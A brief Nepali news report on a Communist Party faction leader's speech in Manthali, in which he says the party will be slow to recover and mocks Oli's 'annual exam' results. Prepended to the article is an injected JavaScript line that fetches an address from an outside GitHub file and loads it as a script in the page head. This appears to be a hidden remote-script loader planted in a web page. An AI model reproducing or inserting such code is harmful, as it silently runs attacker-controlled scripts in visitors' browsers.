;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
माघ ०६,
रामेछाप । नेपाल कम्युनिष्ट पार्टी प्रचण्ड-नेपाल समूहका नेता पूर्व संविधान सभा सदस्य देवशंखर पौडेलले नेकपा उठ्न धेरै समय लाग्ने बताएका छन् ।
आफ्नो समूहले मन्थलीमा गरेको भनेलालाई सम्बोधन गर्दै उनले यस्तो बताएका हुन् । ओलीले बार्षिक परीक्षमा आलु नम्बर ल्याएको बताए ।
आयोजना गरेको कार्यकर्ता भेलालाई सम्बोधन गर्दै उनले भने-ओलीले धेरै परीक्षा दिएको आन्तरिक परीक्षमा ९५ प्रतिशत ल्याए, दोस्रो परीक्षमा ७५ परीक्षा ल्याए तर वार्षिक परीक्षामा आलु नम्बर ल्याए । आन्यबाटोमा लागेका साथिहरुलाई मूल पार्टी यही भएको भन्दै यही पार्टीमा आउन आह्वन गरे ।
फेसबुक प्रतिक्रियाहरु